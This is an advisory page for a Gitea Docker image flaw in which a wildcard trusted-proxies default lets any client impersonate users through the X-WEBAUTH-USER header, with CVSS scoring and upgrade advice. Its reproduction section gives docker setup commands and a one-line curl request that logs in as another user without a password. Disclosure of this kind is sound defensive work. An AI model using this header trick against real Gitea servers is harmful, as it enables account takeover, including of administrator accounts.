Loading...
Skip to main content

CVE-2026-20896

CRITICAL

Gitea Docker image: `REVERSE_PROXY_TRUSTED_PROXIES = *` default lets any source IP impersonate any user via `X-WEBAUTH-USER`

Published July 21, 2026Updated July 22, 2026Source: osv

Summary

# Summary The Gitea Docker images ship an `app.ini` template that hard-codes: ``` REVERSE_PROXY_TRUSTED_PROXIES = * ``` The documented default for this setting, in `custom/conf/app.example.ini`, is `127.0.0.0/8,::1/128`, i.e. only loopback is trusted. When an admin enables `ENABLE_REVERSE_PROXY_AUTHENTICATION = true` to put Gitea behind an authenticating reverse proxy and leaves the trusted-proxies setting at "the default", they expect only the proxy's loopback connection to inject identity. The Docker image instead trusts `X-WEBAUTH-USER` from **any source IP** that can reach the container. ## Affected - `gitea/gitea` Docker images (verified `1.26.2`) - `docker/root/etc/templates/app.ini:55` - `docker/rootless/etc/templates/app.ini:52` Binary distribution and self-built deployments that follow `app.example.ini` get the loopback-only default and are not affected. ## Reproduction ``` docker run -d --name g -p 3000:3000 \ -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \ -e GITEA__security__INSTALL_LOCK=true \ gitea/gitea:1.26.2 sleep 15 docker exec --user git g gitea admin user create \ --username alice --password "longpasswordhere1234" \ --email alice@x.test --must-change-password=false Now the attack:: curl -s -L -H "X-WEBAUTH-USER: alice" http://localhost:3000/ \ | grep -oE '<title>[^<]+</title>' ``` Output: `<title>alice - Dashboard - Gitea: Git with a cup of tea</title>` — attacker is logged in as alice with one header, no password, no cookie. Same payload with `X-WEBAUTH-USER: <any_existing_username>` impersonates that user. ## Impact Any process that can reach the Gitea container's HTTP port directly — not through the intended authenticating proxy — can impersonate any user whose login name is known or guessable. Admin accounts (`admin`, `gitea_admin`, etc.) are the obvious targets.

Remediation

Upgrade to the fixed version using your package manager.

Go
Update code.gitea.io/gitea to 1.26.3 or later
go get code.gitea.io/gitea@v1.26.3

After upgrading, run your dependency scanner again to confirm the vulnerability is resolved.

Affected Packages (1)

PackageEcosystemAffectedFixed In
code.gitea.io/gitea
go
All versions1.26.3

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 9.8 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Frequently Asked Questions

What is CVE-2026-20896?
Gitea Docker image: `REVERSE_PROXY_TRUSTED_PROXIES = *` default lets any source IP impersonate any user via `X-WEBAUTH-USER` This vulnerability has been assigned a severity rating of CRITICAL (CVSS score: 9.8/10).
How do I check if my project is affected by CVE-2026-20896?
CVE-2026-20896 affects code.gitea.io/gitea. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2026-20896 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
9.8

Exploitation is straightforward and causes maximum impact. Patch immediately.

Also Known As

GHSA-f75j-4cw6-rmx4
GO-2026-6051

Related CVEs

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies